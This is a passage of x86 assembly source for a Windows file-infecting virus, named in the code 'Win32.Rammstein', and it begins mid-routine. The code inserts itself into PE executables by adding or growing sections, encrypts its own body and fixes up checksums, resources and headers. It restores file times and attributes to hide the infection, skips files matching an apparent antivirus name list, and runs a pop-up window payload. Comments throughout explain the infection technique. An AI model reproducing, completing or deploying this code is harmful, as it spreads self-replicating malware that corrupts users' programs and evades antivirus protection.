[esi.MZ_oeminfo], ax ; + mov ax, [ebp+b] ; + pop esi ; + mov word ptr [esi.OH_MajorImageVersion], ax ; + mov ax, [ebp+c] ; + mov word ptr [esi.OH_MinorImageVersion], ax ; + ; + mov eax, [ebp+sizeofheaders] ;rearrange size of headers + mov [esi.OH_SizeOfHeaders], eax ; + ; + mov esi, [ebp+peheader] ; + ; + cmp [ebp+method], METHOD_INCREASE_LAST ; + je no_need_to_increase ; + inc word ptr [esi.NumberOfSections] ; + ; +no_need_to_increase: ; + IF CHECKSUM ; + mov eax, [esi.OH_CheckSum] ; + or eax, eax ; + jz no_checksum ; + ; + mov ebx, [ebp+checksumfile] ; + or ebx, ebx ; + jz no_checksum ; + ; + mov esi, [ebp+optionalheader] ; + mov eax, [esi.OH_CheckSum] ; + or eax, eax ; + jz no_checksum ; + lea eax, [esi.OH_CheckSum] ; + push eax ; + lea eax, [ebp+offset headersum] ; + push eax ; + push [ebp+filesize] ; + push [ebp+haddress] ; + call ebx ; + ELSE ; + mov esi, [ebp+optionalheader] ; + xor eax, eax ; + mov [esi.OH_CheckSum], eax ; + ENDIF ; + ; +no_checksum: ; + mov esi, [ebp+finaldestination] ;our internal encryptor + add esi, (EncryptedArea - start) ; + mov edi, esi ; + mov ecx, (end2-EncryptedArea) ; + ; +EncryptLoop: ; + lodsb ; + mov ebx, ecx ; + inc bl ; + jp _parity ; + rol al, cl ; + jmp do_encrypt ; + ; +_parity: ; + ror al, cl ; + ; +do_encrypt: ; + stosb ; + loop EncryptLoop ; + ; + jmp infection_succesfull ;success!!! ;-) + ; + m dw 0 ; + n dw 0 ; + a dw 0 ; + b dw 0 ; + c dw 0 ; + two dw 2 ; + ; +move_virus_size: ;this moves as many bytes + mov ecx, virussize ;as the virus size is.. + rep movsb ; + ret ; + ; + +;I found out today a very important thing... Some of the pe files inside +;the windows directory have a certain particularity that requires special +;care... That is some of the directories present in the DataDirectory have +;a RVA that falls inside the code section. This is the case for the +;Import Address Table (IAT), which for some file occurs at the beginning of +;the code section. If the virus places itself over that area, than, first of +;all the running of the original file will be faulted, and second of all, a +;part of the virus will be overwritten by the system at load and an error +;will occure for sure. In this situation the virus will check if any of +;the directories intersects it and if so, will try to get another random +;place. If it is not possible, the virus will go at end. +check_intersection: ; + pusha ;save registers! + mov edi, esi ; + add edi, eax ; + sub edi, [ebp+codesectionraw] ; + add edi, [ebp+codesectionrva] ; + ; + mov esi, [ebp+optionalheader] ; + lea ebx, [esi.OH_DataDirectory] ; + push ecx ; + mov ecx, [ebp+numberofrva] ;how many directories? + mov edx, 0 ;index in directories. + ; +check_directories: ; + pusha ;save all again! + mov esi, [ebx.edx.DD_VirtualAddress] ; x = X (esi) + or esi, esi ; + jz ok_next_dir ; + mov eax, esi ; x+y = Y (eax) + add eax, [ebx.edx.DD_Size] ; + ; + mov ebx, edi ; a = A (edi) + add ebx, virussize ; a+b = B (ebx) + ; +;We have to check if the interval (X,Y) intersects interval (A,B) + ; + cmp esi, edi ; XB? + jb Intersect ; + ; +ok_next_dir: ; + popa ; + add edx, 8 ; + loop check_directories ; + pop ecx ; + popa ; + clc ; + ret ; + ; +Intersect: ; + popa ; + pop ecx ; + popa ; + stc ; + ret ; + ; +locate_last_section_stuff: ; + pusha ; + ; + mov esi, [ebp+optionalheader] ; + add esi, [ebp+sizeofoptionalheader] ; + mov eax, [ebp+numberofsections] ;get number of sections + ; + push eax esi ;first calculate the + mov ecx, eax ; + mov eax, [esi.SH_PointerToRawData] ; + mov [ebp+lowest_section_raw], eax ;lowest pointer to raw + xor edx, edx ; + ; +compare_rva: ; + add edx, [esi.SH_VirtualSize] ; + mov eax, [esi.SH_PointerToRawData] ; + cmp [ebp+lowest_section_raw], eax ; + jbe next_compare ; + xchg [ebp+lowest_section_raw], eax ; + ; +next_compare: ; + add esi, IMAGE_SIZEOF_SECTION_HEADER ; + loop compare_rva ; + ; +; add edx, [ebp+sizeofheaders] ;useless crap... +; mov [ebp+totalsizes], edx ; + ; + pop esi eax ; + ; + dec eax ;go for last + mov ecx, IMAGE_SIZEOF_SECTION_HEADER ;multiply with the size + xor edx, edx ;of a section + mul ecx ; + add esi, eax ; + mov [ebp+lastsectionheader], esi ;save pointer to header + mov eax, [esi.SH_VirtualAddress] ; + mov [ebp+lastsectionrva], eax ; + mov eax, [esi.SH_PointerToRawData] ; + mov [ebp+lastsectionraw], eax ; + mov eax, [esi.SH_SizeOfRawData] ;choose the smaller of + mov ebx, [esi.SH_VirtualSize] ;the sizes + + +; Major fix-up!! Many PE files mark in the section header a value which is +; much smaller than the real size of the data. The real value gets calculated +; somehow by the loader, so if we place at the end of one of the sizes we +; will probably overwrite data, so I will simply place it at the end of +; the file, even if this means increasing the infected victim. +; +; if you want to enable the placing in the last section cavity unmark the +; following lines: +; +; call choose_smaller ; +; or eax, eax ;if one is zero, try the +; jnz last_size_ok ;other; if both are 0... +; xchg eax, ebx ; +; or eax, eax ; +; jnz last_size_ok ; + ; +consider_eof: ;...consider the EOF as + mov eax, [ebp+filesize] ;the last section dest. + jmp save_it ; + ; +last_size_ok: ;if the size is ok, then + mov ebx, [esi.SH_PointerToRawData] ;retrieve the pointer to + or ebx, ebx ;raw data. If it is 0 + jz consider_eof ;take eof, otherwise add + add ebx, eax ;it to obtain the pos. + xchg ebx, eax ; + cmp eax, [ebp+filesize] ;if it exceedes the file + ja consider_eof ;size also consider EOF. + ; +save_it: ; + mov [ebp+last_section_destination], eax ;save last section pointer + mov eax, [esi.SH_VirtualAddress] ; + mov esi, [ebp+optionalheader] ; + mov ebx, [esi.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress] + cmp eax, ebx ; + jne not_relocations ; + mov [ebp+situation], RELOCATIONS_LAST ; + jmp done_last ; + ; +not_relocations: ; + mov ebx, [esi.OH_DataDirectory.DE_Resource.DD_VirtualAddress] + cmp eax, ebx ; + jne no_resources ; + mov [ebp+situation], RESOURCES_LAST ; + jmp done_last ; + ; +no_resources: ; + mov [ebp+situation], WE_ARE_LAST ; + ; +done_last: ; + popa ; + ret ; + ; +add_new_section: ; + pusha ;save all + mov eax, 123h ;choose some random + call brandom32 ;increasement + add eax, virussize ; + mov [ebp+newraw], eax ;save new raw + call align_to_filealign ; + mov [ebp+newsize], eax ;save new aligned size + ; + mov esi, [ebp+optionalheader] ; + mov ecx, [ebp+numberofrva] ; + add esi, [ebp+sizeofoptionalheader] ; + sub esi, 8 ; + mov eax, 0EEEEEEEEh ; + ; +choose_smallest_directory_va: ; + mov ebx, [esi] ; + or ebx, ebx ; + jz go_to_next ; + cmp eax, ebx ; + ja found_smaller_va ; + jmp go_to_next ; + ; +found_smaller_va: ; + mov eax, ebx ; + ; +go_to_next: ; + sub esi, 8 ; + loop choose_smallest_directory_va ; + ; + mov [ebp+smallest_dir_va], eax ; + sub eax, IMAGE_SIZEOF_SECTION_HEADER ; + add eax, [ebp+haddress] ; + ; + mov esi, [ebp+lastsectionheader] ;go to last section header + mov ecx, IMAGE_SIZEOF_SECTION_HEADER ; + ; + mov ebx, esi ; + add ebx, ecx ; + add ebx, ecx ; + cmp ebx, eax ; + ja its_not_ok ; + ; + mov edi, esi ; + add edi, ecx ; + mov eax, edi ;can we insert a new + sub eax, [ebp+haddress] ;section header? + add eax, IMAGE_SIZEOF_SECTION_HEADER ; + cmp eax, [ebp+lowest_section_raw] ; + jb its_ok ; + ; +its_not_ok: ; + popa ; + stc ; + ret ; + ; +its_ok: ; + rep movsb ;and make a copy of it + ; + mov eax, [ebp+sizeofheaders] ; + sub edi, [ebp+haddress] ; + cmp edi, eax ; + jbe ok_header_size ; + add eax, IMAGE_SIZEOF_SECTION_HEADER ; + call align_to_filealign ; + mov [ebp+sizeofheaders], eax ; + ; +ok_header_size: ; + cmp [ebp+situation], WE_ARE_LAST ;are we at end? + jne not_last ; + ; + mov esi, [ebp+lastsectionheader] ;if yes, then we + mov ebx, [esi.SH_VirtualAddress] ;rearrange the last header + mov eax, [ebp+last_section_destination] ; + sub eax, [esi.SH_PointerToRawData] ; + call align_to_filealign ; + add ebx, eax ; + add esi, IMAGE_SIZEOF_SECTION_HEADER ; + mov [esi.SH_VirtualAddress], eax ; + call set_our_sizes ;and set our sizes + jmp done_adding ; + ; +not_last: ;if we are not last, we + mov eax, [ebp+filesize] ; + sub eax, [esi.SH_PointerToRawData] ;must rearrange both + mov ecx, eax ;headers + mov esi, [esi.SH_PointerToRawData] ; + mov [ebp+last_section_destination], esi ; + add esi, [ebp+haddress] ; + add esi, eax ; + mov edi, esi ; + add edi, [ebp+newsize] ; + std ; + rep movsb ;and move the last section + cld ;below our new section + mov esi, [ebp+lastsectionheader] ; + call set_our_sizes ; + mov ebx, [esi.SH_VirtualAddress] ; + add ebx, [esi.SH_SizeOfRawData] ; + add esi, IMAGE_SIZEOF_SECTION_HEADER ; + mov eax, [ebp+newsize] ; + add [esi.SH_PointerToRawData], eax ; + mov eax, ebx ; + call align_to_sectionalign ; + mov [esi.SH_VirtualAddress], eax ; + mov esi, [ebp+optionalheader] ; + ; + cmp [ebp+situation], RESOURCES_LAST ;check if we must fix + jne then_relocs ;resources + ; + mov [esi.OH_DataDirectory.DE_Resource.DD_VirtualAddress], ebx + call RealignResources ; + jmp done_adding ; + ; +then_relocs: ; + mov [esi.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress], ebx + call RealignRelocs ; + jmp done_adding ; + ; +set_our_sizes: ; + call set_our_name ; + mov eax, [ebp+newraw] ;set our new raw size + mov [esi.SH_VirtualSize], eax ;and our virtual size + call align_to_filealign ; + mov [esi.SH_SizeOfRawData], eax ; + mov [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ+\ + IMAGE_SCN_CNT_INITIALIZED_DATA + ret ; + ; +done_adding: ; + popa ; + clc ; + ret ; + ; +set_our_name: ; + pusha ; + push esi ; + mov esi, [ebp+optionalheader] ; + add esi, [ebp+sizeofoptionalheader] ; + mov ecx, [ebp+numberofsections] ; + mov ebx, section_names_number ; + ; +compare_names: ; + push ecx ; + lea edi, [ebp+section_names] ; + mov ecx, section_names_number ; + ; +compare: ; + inc edi ; + push ecx esi edi ; + mov ecx, 8 ; + rep cmpsb ; + je mark_it ; + ; +next_name: ; + pop edi esi ecx ; + add edi, 8 ; + loop compare ; + jmp next_section ; + ; +mark_it: ; + mov byte ptr [edi-9], 0 ; + dec ebx ; + pop edi esi ecx ; + jmp next_section ; + ; +next_section: ; + add esi, IMAGE_SIZEOF_SECTION_HEADER ; + pop ecx ; + loop compare_names ; + ; + or ebx, ebx ; + jz choose_safe ; + mov eax, ebx ; + call brandom32 ; + lea edi, [ebp+section_names] ; + sub edi, 9 ; + mov ecx, eax ; + or ecx, ecx ; + jnz choose_name ; + add edi, 9 ; + jmp done_choosing ; + ; +choose_name: ; + add edi, 9 ; + cmp byte ptr [edi], 1 ; + je looping ; + inc ecx ;don't count it + ; +looping: ; + loop choose_name ; + ; +done_choosing: ; + inc edi ; + pop esi ; + xchg esi, edi ; + mov ecx, 8 ; + rep movsb ; + popa ; + ret ; + ; +choose_safe: ; + lea edi, [ebp+safe] ; + jmp done_choosing ; + ; +section_names: ;our new section not so + db 1, "DATA" , 0, 0, 0, 0 ;random name... + db 1, ".data" , 0, 0, 0 ; + db 1, ".idata", 0, 0 ; + db 1, ".udata", 0, 0 ; + db 1, "BSS" , 0, 0, 0, 0, 0 ; + db 1, ".rdata", 0, 0 ; + db 1, ".sdata", 0, 0 ; + db 1, ".edata", 0, 0 ; +section_names_number = ($-offset section_names)/9 ; +safe db 0,0,0,0,0,0,0,0 ; + ; +increase_last_section: ; + mov [ebp+method], METHOD_INCREASE_LAST ; + mov esi, [ebp+lastsectionheader] ; + mov eax, [ebp+newraw] ; + add [esi.SH_SizeOfRawData], eax ; + mov eax, [ebp+newsize] ; + add [esi.SH_VirtualSize], eax ; + mov eax, [ebp+last_section_destination] ; + add eax, [ebp+haddress] ; + mov [ebp+finaldestination], eax ; + or [esi.SH_Characteristics], IMAGE_SCN_MEM_WRITE+IMAGE_SCN_MEM_READ + ret ; + ; +CalculateDelta: + mov esi, [ebp+lastsectionheader] ;go to last section + mov eax, [esi.SH_VirtualAddress] ;and calculate the + add esi, IMAGE_SIZEOF_SECTION_HEADER ;RVA delta + sub eax, [esi.SH_VirtualAddress] ; + neg eax ; + ret ; + ; +RealignResources: ; + call CalculateDelta ; + mov [ebp+DeltaRVA], eax ; + mov esi, dword ptr [esi.SH_PointerToRawData]; Point the resources + add esi, dword ptr [ebp+haddress] ; and align in memo + mov edi, esi ; save in edi + add edi, IMAGE_RESOURCE_DIRECTORY_SIZE ; skip resource dir + call parse_resource_directory ; parse all + ret ; + ; +parse_resource_directory: ; + xor ecx, ecx ; + mov cx, word ptr [esi.RD_NumberOfNamedEntries]; NamedEntries+IdEntries + add cx, word ptr [esi.RD_NumberOfIdEntries] ; is our counter + ; + add esi, IMAGE_RESOURCE_DIRECTORY_SIZE ; skip resource dir + ; +parse_this_one: ; + push ecx ; save counter + push esi ; save address + call parse_resource ; parse the dir + pop esi ; restore address + pop ecx ; restore counter + add esi, 8 ; get next entry + loop parse_this_one ; loop until cx=0 + ret ; return + ; +parse_resource: ; + mov eax, [esi.RDE_OffsetToData] ; get offset to data + mov esi, edi ; get base of resorurces + test eax, 80000000h ; is it a subdirectory? + jz data_is_resource ; + ; +data_is_directory: ; + xor eax, 80000000h ; if it is a subdirectory + add esi, eax ; find it's address and + sub esi, 10h ; + call parse_resource_directory ; go to parse it too... + ret ; + ; +data_is_resource: ; if it is data, then + add esi, eax ; find out it's address + sub esi, 10h ; + mov eax, dword ptr [ebp+DeltaRVA] ; and increment the offs + add dword ptr [esi.REDE_OffsetToData], eax ; to data with our Delta + ret ; and ret... + ; +RealignRelocs: ; + ret ; + ; +infection_succesfull: ; + mov [ebp+flag], 0 ;mark good infection + ; +close_address: ; + call [ebp+_UnmapViewOfFile], [ebp+haddress] ;unmap view + ; +close_map: ; + call [ebp+_CloseHandle], [ebp+hmap] ;close map object + ; +close_file: ; + call [ebp+_SetFilePointer], [ebp+hfile], [ebp+filesize], 0, FILE_BEGIN + call [ebp+_SetEndOfFile], [ebp+hfile] ;set EOF + lea ebx, [ebp+filetime1] ;restore the file time + push ebx ; + add ebx, 8 ; + push ebx ; + add ebx, 8 ; + push ebx ; + push [ebp+hfile] ; + call [ebp+_SetFileTime] ;restore file time + call [ebp+_CloseHandle], [ebp+hfile] ;close file + ; +finished: ; + call [ebp+_SetFileAttributesA], [ebp+filename], [ebp+fileattributes] + cmp [ebp+flag], 0 ;restore attributes + je succesfull_infection ; + ; +failed_infection: ; + mov [ebp+fileopen], FALSE ; + popa ; + stc ; + ret ; + ; +succesfull_infection: ; + mov [ebp+fileopen], FALSE ; + popa ; + clc ; + ret ; + ; +choose_smaller: ; + cmp eax, ebx ; + ja get_ebx ; + ret ; + ; +get_ebx: ; + xchg eax, ebx ; + ret ; + ; +align_to_filealign: ;here are the aligning + mov ecx, [ebp+filealign] ;procedures + jmp align_eax ; + ; +align_to_sectionalign: ; + mov ecx, [ebp+sectionalign] ; + ; +align_eax: ; + push edx ; + xor edx, edx ; + div ecx ; + or edx, edx ; + jz $+3 ; + inc eax ; + mul ecx ; + pop edx ; + ret ; + ; +InfectFile endp ; + ; +fileattributes dd 0 ; +filesize dd 0 ; +filetime1 dq 0 ; +filetime2 dq 0 ; +filetime3 dq 0 ; +hfile dd 0 ; +hmap dd 0 ; +haddress dd 0 ; +flag dd 0 ; +additional dd 0 ; +peheader dd 0 ; +lastsectionheader dd 0 ; +last_section_destination dd 0 ; +codesectionraw dd 0 ; +codesectionheader dd 0 ; +finaldestination dd 0 ; +method dd 0 ; +pedata label ; +numberofsections dd 0 ; stored as dword!! +sizeofoptionalheader dd 0 ; stored as dword!! +addressofentrypoint dd 0 ; +_imagebase dd 0 ; +sectionalign dd 0 ; +filealign dd 0 ; +sizeofimage dd 0 ; +sizeofheaders dd 0 ; +checksum dd 0 ; +numberofrva dd 0 ; +baseofcode dd 0 ; +codesection dd 0 ; +codesectionsize dd 0 ; +lastsection dd 0 ; +lastsectionsize dd 0 ; +increasement dd 0 ; +codedelta dd 0 ; +optionalheader dd 0 ; +filename dd 0 ; +copying db 0 ; +lastsectionraw dd 0 ; +lastsectionrva dd 0 ; +codesectionrva dd 0 ; +codesource dd 0 ; +codedestin dd 0 ; +PayloadThreadID dd 0 ; +;敖陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳陳; +; 樛 樛 樛 樛 樛 ; +; 桀 桀 桀 桀 ; +; 桀 桀 桀 ; +; ; + ; +DoPayload: ; + cmp [ebp+firstgen], 1 ; + jne do_it_now ; + ret ; +do_it_now: ; + pusha ; + lea esi, [ebp+text_start] ; + mov ecx, list_len ; + call not_list ; + ; + lea eax, [ebp+text_start] ; + mov [ebp+current], eax ; + call [ebp+_GetDC], 0 ; + mov [ebp+hdc], eax ; + lea ebx, [ebp+offset chars] ; + call [ebp+_GetCharWidthA], eax, "A", "Z", ebx + lea ebx, [ebp+offset textmetric] ; + call [ebp+_GetTextMetricsA], [ebp+hdc], ebx ; + call [ebp+_GetSystemMetrics], SM_CXFULLSCREEN + mov [ebp+xmax], eax ; + call [ebp+_GetSystemMetrics], SM_CYFULLSCREEN + mov [ebp+ymax], eax ; + ; + xor eax, eax ; + mov ax, [ebp+textmetric.tmHeight] ; + add ax, [ebp+textmetric.tmAscent] ; + add ax, [ebp+textmetric.tmDescent] ; + shl eax, 1 ; + mov [ebp+ylength], eax ; + ; +new_window: ; + mov edi, [ebp+current] ; + call [ebp+_lstrlen], edi ; + add edi, eax ; + inc edi ; + push eax ; + call [ebp+_lstrlen], edi ; + mov edi, [ebp+current] ; + cmp eax, [esp] ; + jb ok_len ; + add edi, [esp] ; + inc edi ; + xchg eax, [esp] ; + ; +ok_len: ; + pop ecx ; + ; + lea esi, [ebp+chars] ; + xchg edi, esi ; + mov [ebp+xlength], 0 ; + xor eax, eax ; + ; +calculate_length: ; + lodsb ; + cmp al, "A" ; + jnb do_Z ; + ; +estimate: ; + xor ebx, ebx ; + mov bx, [ebp+textmetric.tmAveCharWidth] ; + inc ebx ; + jmp compute ; + ; +do_Z: cmp al, "Z" ; + jna do_chars ; + jmp estimate ; + ; +do_chars: ; + sub eax, "A" ; + mov ebx, [edi+eax*4] ; + inc ebx ; + ; +compute: ; + add [ebp+xlength], ebx ; + loop calculate_length ; + ; + call [ebp+_GetModuleHandleA], 0 ; get our handle + mov [ebp+hInst], eax ; save it + ; + mov [ebp+wc.wcxStyle], CS_HREDRAW+CS_VREDRAW+\;window style + CS_GLOBALCLASS+CS_NOCLOSE + lea eax, [ebp+offset WndProc] ; + mov [ebp+wc.wcxWndProc], eax ; window procedure + mov [ebp+wc.wcxClsExtra], 0 ; - + mov [ebp+wc.wcxWndExtra], 0 ; - + mov eax, [ebp+hInst] ; + mov [ebp+wc.wcxInstance], eax ; instance (handle) + ; + call [ebp+_LoadIconA], [ebp+hInst], IDI_APPLICATION ; load our icon + mov [ebp+ourhIcon], eax ; + mov [ebp+wc.wcxIcon], eax ; + mov [ebp+wc.wcxSmallIcon], eax ; + ; + call [ebp+_LoadCursorA], 0, IDC_ARROW ; load out cursor + mov [ebp+wc.wcxCursor], eax ; + ; + mov [ebp+wc.wcxBkgndBrush], COLOR_WINDOW+1 ; + mov dword ptr [ebp+wc.wcxMenuName], NULL ; menu + lea eax, [ebp+szClassName] ; + mov dword ptr [ebp+wc.wcxClassName], eax ; class name + ; + lea eax, [ebp+offset wc] ; + call [ebp+_RegisterClassExA], eax ; register the class! + ; + mov eax, [ebp+xmax] ; + sub eax, [ebp+xlength] ; + call brandom32 ; + mov [ebp+xpos], eax ; + ; + mov eax, [ebp+ymax] ; + sub eax, [ebp+ylength] ; + call brandom32 ; + mov [ebp+ypos], eax ; + ; + lea eax, [ebp+offset szClassName] ; + lea ebx, [ebp+offset szTitleName] ; + call [ebp+_CreateWindowExA],ExtendedStyle,\; Create the Window! + eax,\ ; + ebx,\ ; + DefaultStyle,\ ; + [ebp+xpos],\ ; + [ebp+ypos],\ ; + [ebp+xlength],\ ; + [ebp+ylength],\ ; + 0,\ ; + 0,\ ; + [ebp+hInst],\ ; + 0 ; + ; + mov [ebp+newhwnd], eax ; save handle + ; + call [ebp+_UpdateWindow], dword ptr [ebp+newhwnd]; and update it... + call [ebp+_InvalidateRect], dword ptr [ebp+newhwnd], 0, 0 + ; +msg_loop: ; + lea eax, [ebp+offset msg] ; + call [ebp+_GetMessageA], eax, 0, 0, 0 ; get a message + ; + or ax, ax ; finish? + jz end_loop ; + ; + lea eax, [ebp+offset msg] ; + call [ebp+_TranslateMessage], eax ; translate message + ; + lea eax, [ebp+offset msg] ; + call [ebp+_DispatchMessageA], eax ; dispatch the message + ; + jmp msg_loop ; do again + ; +end_loop: ; + mov esi, [ebp+current] ; + @endsz ; + @endsz ; + lea eax, [ebp+offset text_end] ; + cmp esi, eax ; + jae finish_process ; + cmp [ebp+process_end], 1 ;did the victim finish? + je finish_process ; + mov [ebp+current], esi ; + jmp new_window ; + ; +finish_process: ; + popa ; + ret ; +process_end dd 0 ; + ; +;============================================================================ +WndProc proc uses ebx edi esi,\ ; registers preserved + hwnd:DWORD, wmsg:DWORD, wparam:DWORD, lparam:DWORD ; parameters + LOCAL theDC:DWORD ; + ; + call @@1 ; +@@1: ; + pop esi ; + sub esi, offset @@1 ; + ; + cmp [wmsg], WM_PAINT ; + je wmpaint ; + cmp [wmsg], WM_DESTROY ; destory window + je wmdestroy ; + cmp [wmsg], WM_CREATE ; create window + je wmcreate ; + cmp [wmsg], WM_TIMER ; + jmp defwndproc ; + ; +defwndproc: ; + call [esi+_DefWindowProcA], [hwnd], [wmsg], [wparam], [lparam] ; define + jmp finish ; the window + ; +wmdestroy: ; + call [esi+_ShowWindow], [hwnd], SW_HIDE ; + call [esi+_KillTimer], [hwnd], [esi+htimer]; + call [esi+_PostQuitMessage], 0 ; kill the window + xor eax, eax ; + jmp finish ; + ; +wmpaint: ; + call [esi+_GetDC], [hwnd] ; + mov [theDC], eax ; + lea eax, [esi+offset lppaint] ; + call [esi+_BeginPaint], dword ptr [hwnd],\ ; + eax ; + push [esi+current] ; + call [esi+_lstrlen] ; + push eax ; + call [esi+_TextOutA], dword ptr [theDC], 1, 1,\ + dword ptr [esi+current], eax; + pop eax ; + mov ebx, [esi+current] ; + add ebx, eax ; + inc ebx ; + push ebx ; + push ebx ; + call [esi+_lstrlen] ; + pop ebx ; + xor edx, edx ; + mov dx, [esi+textmetric.tmHeight] ; + call [esi+_TextOutA], dword ptr [theDC], 1, edx, ebx, eax + lea eax, [esi+offset lppaint] ; + call [esi+_EndPaint], dword ptr [hwnd], eax + jmp defwndproc ; + ; +wmcreate: ; + lea eax, [esi+offset TimerProc] ; + call [esi+_SetTimer], dword ptr [hwnd], 1111h,\ + dword ptr [esi+wintime],\ ; + eax ; + mov [esi+htimer], eax ; + jmp defwndproc ; + ; +finish: ; + ret ; +WndProc endp ; + ; +TimerProc proc uses ebx edi esi,\ ; + hwnd:DWORD, wmsg:DWORD, timerid:DWORD, dwtime:DWORD + ; + call @@2 ; +@@2: ; + pop esi ; + sub esi, offset @@2 ; + ; + mov eax, [esi+htimer] ; + cmp [timerid], eax ; + jne exittime ; + call [esi+_PostMessageA], [hwnd], WM_DESTROY, 0, 0 + ; +exittime: ; + ret ; +TimerProc endp ; + ; +text_start: ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter <..> ; + ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter <..> ; + ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter + ; + noter + noter + ; + noter ; + noter ; + ; + noter ; + noter + ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter ; + ; + noter ; + noter ; +text_end: ; +list_len = $-offset text_start ; + ; +wc STD_WINDOW +wintime dd 4000 ; +hInst dd 0 ; +hAccel dd 0 ; +htimer dd 0 ; +ourhIcon dd 0 ; +newhwnd dd 0 ; +msg MSGSTRUCT ; +r RECT ; +lppaint PAINTSTRUCT ; +textmetric TEXTMETRIC ; +xmax dd 0 ; +ymax dd 0 ; +xlength dd 0 ; +ylength dd 0 ; +xpos dd 0 ; +ypos dd 0 ; +current dd 0 ; +hdc dd 0 ; +chars dd "Z"-"A"+2 dup (0) ; +szTitleName db 'Win32.Rammstein', 0 ; +szClassName db 'RAMMSTEIN', 0 ; + ; +DefaultStyle = WS_OVERLAPPED+WS_VISIBLE ; +ExtendedStyle = WS_EX_TOPMOST ; + ; +;==================================================;========================= + ; +ValidateFile: ; +; ESI = pointer to filename ; +ret + pusha ; + lea eax, [ebp+VF_ExceptionExit] ; Setup a SEH frame + push eax ; + push dword ptr fs:[0] ; + mov fs:[0], esp ; + ; + call [ebp+_lstrlen], esi ;get the filename length + cmp eax, 256 ;is it too big? + ja invalid_file ; + mov ecx, eax ; + ; + push ecx ;uppercase the name + call [ebp+_CharUpperBuffA], esi, ecx ; + pop ecx ; + ; + @endsz ;go to it's end + inc ecx ; + std ; + mov edi, esi ;and look backwards for + mov al,'\' ;the '\' + repnz scasb ; + mov esi, edi ; + or ecx, ecx ; + jz no_increase ; + inc esi ;if we found one, point it + inc esi ; + ; +no_increase: ; + cld ;restore direction + lea edi, [ebp+offset avoid_list] ;our avoid list + ; +search_next: ; + cmp byte ptr [edi], 0FFh ;last entry? + je all_names_ok ; + xor ebx, ebx ; + mov bl, [edi+4] ;get the name length + xor ecx, ecx ; + xchg byte ptr [esi+ebx], cl ;limit our string to the + push esi ;length with a 0 + call StringCRC32 ;and compute a crc32 for + pop esi ;the piece... + xchg byte ptr [esi+ebx], cl ;restore filename + cmp eax, [edi] ;does it match? + je av_name_found ; + add edi, 5 ;get next... + jmp search_next ; + ; +av_name_found: ; +invalid_file: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ; + popa ; + stc ; + ret ; + ; +all_names_ok: ; + pop dword ptr fs:[0] ;and restore the SEH + add esp, 4 ; + popa ; + clc ; + ret ; + ; + VF_ExceptionExit: ;if we had an error we + mov esp, [esp+8] ;must restore the ESP + call DeltaRecoverVF ; + DeltaRecoverVF: ; + pop ebp ; + sub ebp, offset DeltaRecoverVF ; + jmp invalid_file ; + ; +avoid_list: ; + crc32 <AV> ; + db 3 ; + crc32 <_AV> ;the list with filenames + db 3 ;to avoid + crc32 ; + db 5 ; + crc32 ; + db 4 ; + crc32 ; + db 3 ; + crc32 ; + db 3 ; + crc32 ; + db 6 ; + crc32 ; + db 8 ; + crc32 ; + db 8 ; + crc32 ; + db 2 ; + crc32 ; + db 2 ; + crc32 ; + db 2 ; + crc32 ; + db 2 ; + crc32